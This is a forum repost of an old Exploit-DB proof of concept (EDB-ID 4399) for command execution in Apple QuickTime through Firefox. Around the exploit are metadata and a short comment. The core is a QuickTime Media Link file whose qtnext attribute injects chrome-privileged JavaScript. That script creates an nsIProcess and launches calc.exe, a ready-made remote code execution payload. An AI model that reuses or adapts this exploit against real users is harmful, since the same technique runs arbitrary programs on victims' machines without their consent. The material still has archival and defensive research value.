Exploit Apple QuickTime (Multiple Browsers) - Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4399
Проверка EDB
  1. Пройдено
Автор
PDP
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2007-09-12
HTML:
<!--
http://www.gnucitizen.org/blog/0day-quicktime-pwns-firefox

It seams that QuickTime media formats can hack into Firefox. 
The result of this vulnerability can lead to full compromise of 
the browser and maybe even the underlaying operating system. 
Don't try this at home.
-->

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\windows\\system32\\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>

# milw0rm.com [2007-09-12]
 
Источник
www.exploit-db.com

Похожие темы